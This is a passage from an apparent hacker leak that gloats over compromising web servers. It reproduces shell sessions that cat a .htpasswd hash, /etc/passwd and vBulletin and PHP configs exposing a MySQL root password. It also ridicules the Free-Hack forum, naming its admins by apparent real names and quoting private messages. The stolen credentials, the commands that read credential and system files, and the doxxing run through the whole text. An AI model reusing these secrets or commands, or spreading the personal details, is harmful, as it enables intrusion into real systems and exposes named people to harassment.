4014@mysql_select_db($database) or die( "Unable to select database");
4015$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
4016mysql_query($query);
4017mysql_close();
4018 header( "Location: $link ");
4019 exit;
4020}
4021
4022else
4023{
4024 exit;
4025}
4026
4027?>
4028
4029
4030$ cat s.php
4031<?php
4032
4033
4034$username="root";
4035$password="234hi2u3d98as7d23kuh";
4036$database="counter";
4037
4038
4039
4040mysql_connect("localhost",$username,$password);
4041@mysql_select_db($database) or die( "Unable to select database");
4042$query = "select count(DISTINCT ip) as numrows from downloadz where version=\"bt4f\"";
4043$query2 = "select count(DISTINCT ip) as numrows from downloadz where version=\"bt4fvm\"";
4044$result=mysql_query($query);
4045$result2=mysql_query($query2);
4046$row2 = mysql_fetch_array($result2, MYSQL_ASSOC);
4047$row = mysql_fetch_array($result, MYSQL_ASSOC);
4048$numrows1 = $row['numrows'];
4049$numrows2 = $row2['numrows'];
4050mysql_close();
4051
4052$total= round(($numrows1 + $numrows2) * 1.4);
4053
4054echo "BackTrack 4 Final - $total unique downloads";
4055
4056?>
4057
4058$ cd wiki
4059
4060$ ls
4061
4062total 700
4063drwxr-xr-x. 15 apache apache 4096 Nov 27 16:52 .
4064drwxr-xr-x. 13 apache apache 4096 Dec 9 12:21 ..
4065-rw-r--r--. 1 apache apache 23 Nov 14 16:01 .htpasswd
4066-rw-r--r--. 1 apache apache 17997 Apr 5 2006 COPYING
4067-rw-r--r--. 1 apache apache 2073 Jul 27 07:29 CREDITS
4068-rw-r--r--. 1 apache apache 76 Jul 27 2009 FAQ
4069-rw-r--r--. 1 apache apache 392287 Mar 12 2010 HISTORY
4070-rw-r--r--. 1 apache apache 96 Nov 14 16:01 HT
4071-rw-r--r--. 1 apache apache 4138 Apr 18 2008 INSTALL
4072-rw-r--r--. 1 apache apache 5469 Nov 28 16:45 LocalSettings.php
4073-rw-r--r--. 1 apache apache 3649 Nov 11 2008 README
4074-rw-r--r--. 1 apache apache 58431 Jul 28 03:11 RELEASE-NOTES
4075-rw-r--r--. 1 apache apache 648 May 7 2009 StartProfiler.sample
4076-rw-r--r--. 1 apache apache 13307 Mar 25 2010 UPGRADE
4077drwxr-xr-x. 2 root root 4096 Nov 27 16:53 adsense
4078-rw-r--r--. 1 apache apache 4707 Feb 15 2010 api.php
4079-rw-r--r--. 1 apache apache 25 Feb 3 2008 api.php5
4080drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 bin
4081-rw-r--r--. 1 apache apache 8436 Nov 21 14:24 bt-wiki.png
4082drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 cache
4083drwxr-xr-x. 2 apache apache 4096 Nov 14 15:58 config
4084drwxr-xr-x. 4 apache apache 4096 Jul 28 03:16 docs
4085drwxr-xr-x. 4 apache apache 4096 Nov 28 16:44 extensions
4086drwxr-xr-x. 12 apache apache 4096 Nov 23 12:36 images
4087-rw-r--r--. 1 apache apache 4031 Oct 14 2009 img_auth.php
4088-rw-r--r--. 1 apache apache 31 Feb 3 2008 img_auth.php5
4089drwxr-xr-x. 16 apache apache 4096 Jul 28 03:16 includes
4090-rw-r--r--. 1 apache apache 4329 Jan 1 2010 index.php
4091-rw-r--r--. 1 apache apache 28 Feb 3 2008 index.php5
4092drwxr-xr-x. 4 apache apache 4096 Jul 28 03:16 languages
4093drwxr-xr-x. 13 apache apache 12288 Nov 22 12:55 maintenance
4094drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 math
4095-rw-r--r--. 1 apache apache 3054 Mar 21 2009 opensearch_desc.php
4096-rw-r--r--. 1 apache apache 39 Mar 3 2008 opensearch_desc.php5
4097-rw-r--r--. 1 apache apache 174 Feb 3 2010 php5.php5
4098-rw-r--r--. 1 apache apache 8821 Jul 27 03:40 profileinfo.php
4099-rw-r--r--. 1 apache apache 383 Mar 21 2009 redirect.php
4100-rw-r--r--. 1 apache apache 31 Feb 3 2008 redirect.php5
4101-rw-r--r--. 1 apache apache 89 Feb 3 2010 redirect.phtml
4102drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 serialized
4103-rwxrwxrwx. 1 root root 6816 Nov 23 18:29 sitemap.xml
4104drwxr-xr-x. 9 apache apache 4096 Nov 28 14:12 skins
4105-rw-r--r--. 1 apache apache 4905 Mar 8 2010 thumb.php
4106-rw-r--r--. 1 apache apache 29 Feb 3 2008 thumb.php5
4107-rw-r--r--. 1 apache apache 1347 Nov 5 2008 trackback.php
4108-rw-r--r--. 1 apache apache 32 Mar 16 2009 trackback.php5
4109-rw-r--r--. 1 apache apache 86 Feb 3 2010 wiki.phtml
4110
4111$ cat .htpasswd
4112edbadmin:YE8mle4nG1Z.c
4113
4114cd ..
4115cat forums/includes/config.php
4116<?php
4117/*======================================================================*\
4118|| #################################################################### ||
4119|| # vBulletin 4.0.0 Patch Level 1
4120|| # ---------------------------------------------------------------- # ||
4121|| # All PHP code in this file is ©2000-2010 vBulletin Solutions Inc. # ||
4122|| # This file may not be redistributed in whole or significant part. # ||
4123|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
4124|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
4125|| #################################################################### ||
4126\*======================================================================*/
4127
4128/*-------------------------------------------------------*\
4129| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
4130+---------------------------------------------------------+
4131| If you get any errors while attempting to connect to |
4132| MySQL, you will need to email your webhost because we |
4133| cannot tell you the correct values for the variables |
4134| in this file. |
4135\*-------------------------------------------------------*/
4136
4137 // ****** DATABASE TYPE ******
4138 // This is the type of the database server on which your vBulletin database will be located.
4139 // Valid options are mysql and mysqli, for slave support add _slave. Try to use mysqli if you are using PHP 5 and MySQL 4.1+
4140 // for slave options just append _slave to your preferred database type.
4141$config['Database']['dbtype'] = 'mysql';
4142
4143 // ****** DATABASE NAME ******
4144 // This is the name of the database where your vBulletin will be located.
4145 // This must be created by your webhost.
4146$config['Database']['dbname'] = 'forums';
4147
4148 // ****** TABLE PREFIX ******
4149 // Prefix that your vBulletin tables have in the database.
4150$config['Database']['tableprefix'] = '';
4151
4152 // ****** TECHNICAL EMAIL ADDRESS ******
4153 // If any database errors occur, they will be emailed to the address specified here.
4154 // Leave this blank to not send any emails when there is a database error.
4155$config['Database']['technicalemail'] = 'muts@offsec.com';
4156
4157 // ****** FORCE EMPTY SQL MODE ******
4158 // New versions of MySQL (4.1+) have introduced some behaviors that are
4159 // incompatible with vBulletin. Setting this value to "true" disables those
4160 // behaviors. You only need to modify this value if vBulletin recommends it.
4161$config['Database']['force_sql_mode'] = false;
4162
4163
4164
4165 // ****** MASTER DATABASE SERVER NAME AND PORT ******
4166 // This is the hostname or IP address and port of the database server.
4167 // If you are unsure of what to put here, leave the default values.
4168$config['MasterServer']['servername'] = 'localhost';
4169$config['MasterServer']['port'] = 3306;
4170
4171 // ****** MASTER DATABASE USERNAME & PASSWORD ******
4172 // This is the username and password you use to access MySQL.
4173 // These must be obtained through your webhost.
4174$config['MasterServer']['username'] = 'root';
4175$config['MasterServer']['password'] = '234hi2u3d98as7d23kuh';
4176
4177 // ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
4178 // This option allows you to turn persistent connections to MySQL on or off.
4179 // The difference in performance is negligible for all but the largest boards.
4180 // If you are unsure what this should be, leave it off. (0 = off; 1 = on)
4181$config['MasterServer']['usepconnect'] = 0;
4182
4183
4184
4185 // ****** SLAVE DATABASE CONFIGURATION ******
4186 // If you have multiple database backends, this is the information for your slave
4187 // server. If you are not 100% sure you need to fill in this information,
4188 // do not change any of the values here.
4189$config['SlaveServer']['servername'] = '';
4190$config['SlaveServer']['port'] = 3306;
4191$config['SlaveServer']['username'] = '';
4192$config['SlaveServer']['password'] = '';
4193$config['SlaveServer']['usepconnect'] = 0;
4194
4195
4196
4197 // ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
4198 // This setting allows you to change the name of the folders that the admin and
4199 // moderator control panels reside in. You may wish to do this for security purposes.
4200 // Please note that if you change the name of the directory here, you will still need
4201 // to manually change the name of the directory on the server.
4202$config['Misc']['admincpdir'] = 'admincphaha';
4203$config['Misc']['modcpdir'] = 'modcphaha';
4204
4205 // Prefix that all vBulletin cookies will have
4206 // Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
4207$config['Misc']['cookieprefix'] = 'bb';
4208
4209 // ******** FULL PATH TO FORUMS DIRECTORY ******
4210 // On a few systems it may be necessary to input the full path to your forums directory
4211 // for vBulletin to function normally. You can ignore this setting unless vBulletin
4212 // tells you to fill this in. Do not include a trailing slash!
4213 // Example Unix:
4214 // $config['Misc']['forumpath'] = '/home/users/public_html/forums';
4215 // Example Win32:
4216 // $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
4217$config['Misc']['forumpath'] = '';
4218
4219
4220
4221 // ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
4222 // The users specified here will be allowed to view the admin log in the control panel.
4223 // Users must be specified by *ID number* here. To obtain a user's ID number,
4224 // view their profile via the control panel. If this is a new installation, leave
4225 // the first user created will have a user ID of 1. Seperate each userid with a comma.
4226$config['SpecialUsers']['canviewadminlog'] = '1';
4227
4228 // ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
4229 // The users specified here will be allowed to remove ("prune") entries from the admin
4230 // log. See the above entry for more information on the format.
4231$config['SpecialUsers']['canpruneadminlog'] = '1';
4232
4233 // ****** USERS WITH QUERY RUNNING PERMISSIONS ******
4234 // The users specified here will be allowed to run queries from the control panel.
4235 // See the above entries for more information on the format.
4236 // Please note that the ability to run queries is quite powerful. You may wish
4237 // to remove all user IDs from this list for security reasons.
4238$config['SpecialUsers']['canrunqueries'] = '';
4239
4240 // ****** UNDELETABLE / UNALTERABLE USERS ******
4241 // The users specified here will not be deletable or alterable from the control panel by any users.
4242 // To specify more than one user, separate userids with commas.
4243$config['SpecialUsers']['undeletableusers'] = '';
4244
4245 // ****** SUPER ADMINISTRATORS ******
4246 // The users specified below will have permission to access the administrator permissions
4247 // page, which controls the permissions of other administrators
4248$config['SpecialUsers']['superadministrators'] = '1,2';
4249
4250 // ****** DATASTORE CACHE CONFIGURATION *****
4251 // Here you can configure different methods for caching datastore items.
4252 // vB_Datastore_Filecache - to use includes/datastore/datastore_cache.php
4253 // vB_Datastore_APC - to use APC
4254 // vB_Datastore_XCache - to use XCache
4255 // vB_Datastore_Memcached - to use a Memcache server, more configuration below
4256// $config['Datastore']['class'] = 'vB_Datastore_Filecache';
4257
4258 // ******** DATASTORE PREFIX ******
4259 // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
4260 // than one set of forums installed on your host, you *may* need to use a prefix
4261 // so that they do not try to use the same variable within the cache.
4262 // This works in a similar manner to the database table prefix.
4263// $config['Datastore']['prefix'] = '';
4264
4265 // It is also necessary to specify the hostname or IP address and the port the server is listening on
4266/*
4267$config['Datastore']['class'] = 'vB_Datastore_Memcached';
4268$i = 0;
4269// First Server
4270$i++;
4271$config['Misc']['memcacheserver'][$i] = '127.0.0.1';
4272$config['Misc']['memcacheport'][$i] = 11211;
4273$config['Misc']['memcachepersistent'][$i] = true;
4274$config['Misc']['memcacheweight'][$i] = 1;
4275$config['Misc']['memcachetimeout'][$i] = 1;
4276$config['Misc']['memcacheretry_interval'][$i] = 15;
4277*/
4278
4279// ****** The following options are only needed in special cases ******
4280
4281 // ****** MySQLI OPTIONS *****
4282 // When using MySQL 4.1+, MySQLi should be used to connect to the database.
4283 // If you need to set the default connection charset because your database
4284 // is using a charset other than latin1, you can set the charset here.
4285 // If you don't set the charset to be the same as your database, you
4286 // may receive collation errors. Ignore this setting unless you
4287 // are sure you need to use it.
4288// $config['Mysqli']['charset'] = 'utf8';
4289
4290 // Optionally, PHP can be instructed to set connection parameters by reading from the
4291 // file named in 'ini_file'. Please use a full path to the file.
4292 // Example:
4293 // $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
4294$config['Mysqli']['ini_file'] = '';
4295
4296// Image Processing Options
4297 // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
4298$config['Misc']['maxwidth'] = 2592;
4299$config['Misc']['maxheight'] = 1944;
4300
4301/*======================================================================*\
4302|| ####################################################################
4303|| # Downloaded: 22:25, Sat Jan 9th 2010
4304|| # CVS: $RCSfile$ - $Revision: 32878 $
4305|| ####################################################################
4306\*======================================================================*/
4307
4308
4309 ____________________________________________________|_._._._._._._._,
4310 \___________________________________________________|_|_|_|_|_|_|_|_|
4311 ! ~ free-hack ~
4312
4313Many people will wonder why we owned Free-Hack because they always
4314claimed to have nothing to do with fraud and stuff. In fact this is
4315the second time we owned them but the first time we go public. The
4316first time was a few months ago in order to check out what they were
4317doing in their internal eleet priv8 sections. To our surprise they
4318really had nothing to do with fraud. Still, they are part of the
4319problem we call the skiddy breeding of lameness.
4320
4321Actually, there are a few communities where you can find a few skilled
4322members. Free-Hack is a forum where you can find two or three. The
4323rest are simple skidi0ts who have no right to even exist, let alone be
4324on our internet. Also the admins, particularly "Suicide" aka Mr.
4325Stefan Finke or "enco" aka Mr. Enrico Costanzo are nothing but
4326arrogant asshats who's only apparent talent appears to be banning
4327people. Oh wait, "Suicide" actually HAS skill. Like he mastered the
4328usage of Hydra and is now able to hax every Teamspeak server. Ph33r.
4329Don't get us wrong; J0hn.X3r, a newer admin, is actually a pretty good
4330guy, who had the right spirit and was willing to learn. But getting
4331promoted to admin in a "hacker" community with ~40k users which has an
4332"expert" zone for "skilled" members who talk about how to bypass the
4333Webspell SQL Injection filter is the worst thing he could have done...
4334
4335 ____________________________________________________________________
4336| __ __ |
4337| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
4338| | _ | | | _ || _| -__|| _ | _ |_ _| |
4339| |__ |_____|_____||____|_____||_____|_____|__.__| |
4340|________|__|________________________________________________________|
4341| |
4342| Suicide: |
4343| Mir fehlt der Stress, das Adrenalin, der Hass den man auf und |
4344| wegen einigen Usern bekommen hat. In den fünf Jahren gab es so |
4345| viel Ärger (Fettemama, Hacksector, CIA-World, Grey-Hats, |
4346| Black-Hats, Mbk, Speedtest). Wieso will sich niemand mehr mit |
4347| uns anlegen? |
4348|____________________________________________________________________|
4349
4350You can have that. There's quite alot of hilarity left in the database
4351backups we prepared. Do not forget to have a look for yourself. We
4352especially liked that guy who trolled fred777 by logging into his
4353account:
4354
4355 ____________________________________________________________________
4356| __ __ |
4357| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
4358| | _ | | | _ || _| -__|| _ | _ |_ _| |
4359| |__ |_____|_____||____|_____||_____|_____|__.__| |
4360|________|__|________________________________________________________|
4361| |
4362| PM from fred777 to enco: |
4363| Hallo, |
4364| |
4365| bitte meinen Namen auf "Wurstkoenig" ändern. Vielen Dank |
4366| |
4367| fred777 |
4368|____________________________________________________________________|
4369
4370That one really worked. GG mate!
4371
4372 ____________________________________________________________________
4373| __ __ |
4374| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
4375| | _ | | | _ || _| -__|| _ | _ |_ _| |
4376| |__ |_____|_____||____|_____||_____|_____|__.__| |
4377|________|__|________________________________________________________|
4378| |
4379| Suicide: |
4380| Warum überhaupt umziehen? Der neue Server hat ungefähr die |
4381| gleichen Attribute wie der Jetzige. Dazu wird die Firewall um das |
4382| doppelte verstärkt. Im Gesamtpaket komme ich da besser weg, als in |
4383| der momentanen Situation. |
4384|____________________________________________________________________|
4385
4386Wut? What Firewall? We didn't see no stinking firewall. Owait it's us.
4387Too ninja again.
4388
4389$ uname -a
4390Linux server1.free-hack.com 2.6.18-194.17.1.el5.028stab070.7 #1 SMP Fri Oct 1 14:17:14 MSD 2010 x86_64 x86_64 x86_64 GNU/Linux
4391
4392$ id
4393uid=508(freehack) gid=504(freehack) groups=504(freehack)
4394
4395$ cat /etc/passwd
4396root:x:0:0:root:/root:/bin/bash
4397bin:x:1:1:bin:/bin:/sbin/nologin
4398daemon:x:2:2:daemon:/sbin:/sbin/nologin
4399adm:x:3:4:adm:/var/adm:/sbin/nologin
4400lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
4401sync:x:5:0:sync:/sbin:/bin/sync
4402shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
4403halt:x:7:0:halt:/sbin:/sbin/halt
4404mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
4405news:x:9:13:news:/etc/news:
4406uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
4407operator:x:11:0:operator:/root:/sbin/nologin
4408games:x:12:100:games:/usr/games:/sbin/nologin
4409gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
4410ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
4411nobody:x:99:99:Nobody:/:/sbin/nologin
4412rpm:x:37:37::/var/lib/rpm:/sbin/nologin
4413dbus:x:81:81:System message bus:/:/sbin/nologin
4414vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
4415named:x:25:25:Named:/var/named:/sbin/nologin
4416mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
4417smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
4418sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
4419rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
4420apache:x:48:48:Apache:/var/www:/sbin/nologin
4421nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
4422pcap:x:77:77::/var/arpwatch:/sbin/nologin
4423haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
4424cpanel:x:32001:32001::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell
4425cpanelhorde:x:32002:32002::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
4426cpanelphpmyadmin:x:32003:32003::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
4427cpanelphppgadmin:x:32004:32004::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
4428cpanelroundcube:x:32005:32005::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
4429xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
4430mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
4431mailman:x:32006:32006::/usr/local/cpanel/3rdparty/mailman/mailman:/usr/local/cpanel/bin/noshell
4432dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
4433freehack:x:508:504::/home/freehack:/usr/local/cpanel/bin/jailshell
4434ntp:x:38:38::/etc/ntp:/sbin/nologin
4435lsadm:x:101:32009::/:/sbin/nologin
4436
4437
4438$ ls -la /
4439total 108
4440drwxr-xr-x 24 root root 4096 Nov 30 02:12 .
4441drwxr-xr-x 24 root root 4096 Nov 30 02:12 ..
4442-rw-r--r-- 1 root root 0 Nov 30 02:12 .autofsck
4443-rw-r--r-- 1 root root 0 Jan 17 2009 .autorelabel
4444drwx------ 2 root 500 4096 Nov 11 18:43 .spamassassin
4445lrwxrwxrwx 1 root root 39 Nov 30 02:12 aquota.group -> /proc/vz/vzaquota/00000045/aquota.group
4446lrwxrwxrwx 1 root root 38 Nov 30 02:12 aquota.user -> /proc/vz/vzaquota/00000045/aquota.user
4447drwx--x--x 3 root root 4096 Nov 13 09:00 backup
4448drwxr-xr-x 2 root root 4096 Nov 17 00:24 bin
4449drwxr-xr-x 2 root root 4096 Jan 26 2010 boot
4450drwxr-xr-x 7 root root 1900 Nov 30 02:12 dev
4451drwxr-xr-x 68 root root 12288 Dec 8 21:35 etc
4452drwx--x--x 8 root root 4096 Nov 14 07:11 home
4453drwxr-xr-x 9 root root 4096 Nov 12 08:24 lib
4454drwxr-xr-x 7 root root 4096 Nov 12 08:24 lib64
4455drwxr-xr-x 2 root root 4096 Jan 26 2010 media
4456drwxr-xr-x 2 root root 4096 Jan 26 2010 mnt
4457drwxr-xr-x 10 root root 4096 Nov 12 16:31 opt
4458dr-xr-xr-x 113 root root 0 Nov 30 02:12 proc
4459drwxr-x--- 14 root root 4096 Dec 8 21:36 root
4460drwxr-xr-x 2 root root 4096 Nov 17 00:24 sbin
4461drwxr-xr-x 5 root root 20480 Dec 8 00:24 scripts
4462drwxr-xr-x 2 root root 4096 Jan 26 2010 selinux
4463drwxr-xr-x 2 root root 4096 Jan 26 2010 srv
4464drwxr-xr-x 3 root root 0 Nov 30 02:12 sys
4465drwxrwxrwt 10 root root 4096 Dec 8 21:36 tmp
4466drwxr-xr-x 16 root root 4096 Nov 11 18:17 usr
4467drwxr-xr-x 22 root root 4096 Nov 11 18:01 var
4468
4469$ ls -la /home/freehack/public_html
4470total 3100
4471drwxr-x--- 34 freehack nobody 4096 Dec 4 22:13 .
4472drwx--x--x 14 freehack freehack 4096 Dec 7 11:15 ..
4473-rw-r--r-- 1 freehack freehack 1086 Dec 4 22:27 .htaccess
4474drwxr-xr-x 11 freehack freehack 4096 Nov 14 09:24 2tgh9322132k322l1sd
4475-rw-r--r-- 1 freehack freehack 6726 Jan 18 2010 LICENSE
4476drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _private
4477drwxr-xr-x 4 freehack freehack 4096 Nov 14 08:28 _vti_bin
4478drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_cnf
4479drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_log
4480drwxr-x--- 2 freehack nobody 4096 Nov 14 07:11 _vti_pvt
4481drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_txt
4482-rw-r--r-- 1 freehack freehack 19341 Jan 18 2010 accessmask.php
4483-rw-r--r-- 1 freehack freehack 12687 Jan 18 2010 admin_rbs.php
4484-rw-r--r-- 1 freehack freehack 2645 Jan 18 2010 admin_rbs_banner_list.php
4485-rw-r--r-- 1 freehack freehack 3089 Jan 18 2010 admin_rbs_convert.php
4486-rw-r--r-- 1 freehack freehack 2667 Jan 18 2010 admin_rbs_d_banner_list.php
4487-rw-r--r-- 1 freehack freehack 2668 Jan 18 2010 admin_rbs_h_banner_list.php
4488-rw-r--r-- 1 freehack freehack 2668 Jan 18 2010 admin_rbs_v_banner_list.php
4489-rw-r--r-- 1 freehack freehack 2681 Jan 18 2010 admin_rbs_x_banner_list.php
4490-rw-r--r-- 1 freehack freehack 39582 Jan 18 2010 admincalendar.php
4491-rw-r--r-- 1 freehack freehack 49644 Jan 18 2010 admininfraction.php
4492-rw-r--r-- 1 freehack freehack 19150 Jan 18 2010 adminlog.php
4493-rw-r--r-- 1 freehack freehack 8149 Jan 18 2010 adminpermissions.php
4494-rw-r--r-- 1 freehack freehack 25516 Jan 18 2010 adminreputation.php
4495-rw-r--r-- 1 freehack freehack 1230 Jan 18 2010 ads.php
4496-rw-r--r-- 1 freehack freehack 23844 Jan 18 2010 ajax.php
4497-rw-r--r-- 1 freehack freehack 75511 Jan 18 2010 album.php
4498drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:04 amecache
4499-rw-r--r-- 1 freehack freehack 17137 Jan 18 2010 announcement.php
4500drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:04 archive
4501-rw-r--r-- 1 freehack freehack 18309 Jan 18 2010 attachment.php
4502-rw-r--r-- 1 freehack freehack 12512 Jan 18 2010 attachmentpermission.php
4503-rw-r--r-- 1 freehack freehack 80983 Jan 18 2010 automediaembed_admin.php
4504-rw-r--r-- 1 freehack freehack 1979 Jan 18 2010 autorefresh_footer.php
4505-rw-r--r-- 1 freehack freehack 1979 Jan 18 2010 autorefresh_header.php
4506-rw-r--r-- 1 freehack freehack 1991 Jan 18 2010 autorefresh_navbar.php
4507-rw-r--r-- 1 freehack freehack 1430 Jan 18 2010 autotagger_ajax.php
4508-rw-r--r-- 1 freehack freehack 19355 Jan 18 2010 avatar.php
4509-rw-r--r-- 1 freehack freehack 46771 Jan 18 2010 banner.png
4510-rw-r--r-- 1 freehack freehack 16461 Jan 18 2010 bbcode.php
4511drwxr-xr-x 6 freehack freehack 4096 Nov 14 08:06 bilder
4512drwxr-xr-x 8 freehack freehack 4096 Nov 25 14:18 blog
4513-rw-r--r-- 1 freehack freehack 14782 Jan 18 2010 bookmarksite.php
4514-rw-r--r-- 1 freehack freehack 75327 Jan 18 2010 calendar.php
4515-rw-r--r-- 1 freehack freehack 12083 Jan 18 2010 calendarpermission.php
4516drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 cgi-bin
4517-rw-r--r-- 1 freehack freehack 43 Jan 18 2010 clear.gif
4518drwxr-xr-x 4 freehack freehack 4096 Nov 14 08:08 clientscript
4519drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:08 control_examples
4520-rw-r--r-- 1 freehack freehack 14938 Jan 18 2010 converse.php
4521drwxr-xr-x 3 freehack freehack 4096 Nov 18 14:14 cpa
4522drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:11 cpm
4523drwxr-xr-x 7 freehack freehack 4096 Nov 14 08:12 cpstyles
4524-rw-r--r-- 1 freehack freehack 3317 Jan 18 2010 cron.php
4525-rw-r--r-- 1 freehack freehack 24049 Jan 18 2010 cronadmin.php
4526-rw-r--r-- 1 freehack freehack 10734 Jan 18 2010 cronlog.php
4527-rw-r--r-- 1 freehack freehack 34087 Jan 18 2010 css.php
4528drwxrwxrwx 3 freehack freehack 4096 Nov 14 08:13 customavatars
4529drwxrwxrwx 3 freehack freehack 4096 Nov 14 08:13 customgroupicons
4530drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:13 customprofilepics
4531-rw-r--r-- 1 freehack freehack 21833 Jan 18 2010 diagnostic.php
4532-rw-r--r-- 1 freehack freehack 47757 Jan 18 2010 editpost.php
4533-rw-r--r-- 1 freehack freehack 11748 Jan 18 2010 email.php
4534-rw-r--r-- 1 freehack freehack 29500 Jan 18 2010 external.php
4535-rw-r--r-- 1 freehack freehack 9786 Jan 18 2010 faq.php
4536-rw-r--r-- 1 freehack freehack 22486 Jan 18 2010 favicon.ico
4537-rw-r--r-- 1 freehack freehack 30137 Jan 18 2010 forum.php
4538-rw-r--r-- 1 freehack freehack 35658 Jan 18 2010 forumdisplay.php
4539-rw-r--r-- 1 freehack freehack 30063 Jan 18 2010 forumpermission.php
4540-rw-r--r-- 1 freehack freehack 15499 Oct 11 10:03 gla_test.php
4541-rw-r--r-- 1 freehack freehack 39830 Jan 18 2010 global.php
4542-rw-r--r-- 1 freehack freehack 53 Oct 24 14:48 googlef4001cc5b1db090b.html
4543-rw-r--r-- 1 freehack freehack 137885 Jan 18 2010 group.php
4544-rw-r--r-- 1 freehack freehack 24919 Jan 18 2010 group_inlinemod.php
4545-rw-r--r-- 1 freehack freehack 10524 Jan 18 2010 groupsubscription.php
4546-rw-r--r-- 1 freehack freehack 25922 Jan 18 2010 help.php
4547drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:13 htaccess
4548-rw-r--r-- 1 freehack freehack 9047 Jan 18 2010 image.php
4549drwxr-xr-x 20 freehack freehack 4096 Nov 14 08:51 images
4550drwxr-xr-x 5 freehack freehack 4096 Nov 14 08:52 img
4551drwxr-xr-x 7 freehack freehack 12288 Dec 4 22:09 includes
4552-rw-r--r-- 1 freehack freehack 19592 Jan 18 2010 index.php
4553-rw-r--r-- 1 freehack freehack 43829 Jan 18 2010 infraction.php
4554-rw-r--r-- 1 freehack freehack 182759 Jan 18 2010 inlinemod.php
4555-rw-r--r-- 1 freehack freehack 10342 Jan 18 2010 joinrequests.php
4556-rw-r--r-- 1 freehack freehack 10222 Jan 18 2010 login.php
4557drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:59 madp
4558-rw-r--r-- 1 freehack freehack 17066 Jan 18 2010 member.php
4559-rw-r--r-- 1 freehack freehack 15931 Jan 18 2010 member_inlinemod.php
4560-rw-r--r-- 1 freehack freehack 35901 Jan 18 2010 memberlist.php
4561-rw-r--r-- 1 freehack freehack 23867 Jan 18 2010 misc.php
4562-rw-r--r-- 1 freehack freehack 63331 Jan 18 2010 moderation.php
4563-rw-r--r-- 1 freehack freehack 6756 Jan 18 2010 moderator.php
4564-rw-r--r-- 1 freehack freehack 18477 Jan 18 2010 newattachment.php
4565-rw-r--r-- 1 freehack freehack 37104 Jan 18 2010 newreply.php
4566-rw-r--r-- 1 freehack freehack 18911 Jan 18 2010 newthread.php
4567-rw-r--r-- 1 freehack freehack 5725 Jan 18 2010 nex_stats_tend_classes.php
4568drwxr-xr-x 9 freehack freehack 4096 Nov 25 18:38 nopaste
4569-rw-r--r-- 1 freehack freehack 12095 Jul 20 15:01 oks.png
4570-rw-r--r-- 1 freehack freehack 19604 Jan 18 2010 online.php
4571-rw-r--r-- 1 freehack freehack 7696 Jan 18 2010 payment_gateway.php
4572-rw-r--r-- 1 freehack freehack 11910 Jan 18 2010 payments.php
4573-rw-r--r-- 1 freehack freehack 7889 Jan 18 2010 picture.php
4574-rw-r--r-- 1 freehack freehack 22040 Jan 18 2010 picture_inlinemod.php
4575-rw-r--r-- 1 freehack freehack 25311 Jan 18 2010 picturecomment.php
4576-rw-r--r-- 1 freehack freehack 27415 Jan 18 2010 poll.php
4577-rw-r--r-- 1 freehack freehack 17744 Jan 18 2010 post_thanks.php
4578-rw-r--r-- 1 freehack freehack 9512 Jan 18 2010 posthistory.php
4579-rw-r--r-- 1 freehack freehack 74369 Jan 18 2010 postings.php
4580-rw-r--r-- 1 freehack freehack 4763 Jan 18 2010 pprm.php
4581-rw-r--r-- 1 freehack freehack 6594 Jan 18 2010 printthread.php
4582-rw-r--r-- 1 freehack freehack 70748 Jan 18 2010 private.php
4583-rw-r--r-- 1 freehack freehack 152336 Jan 18 2010 profile.php
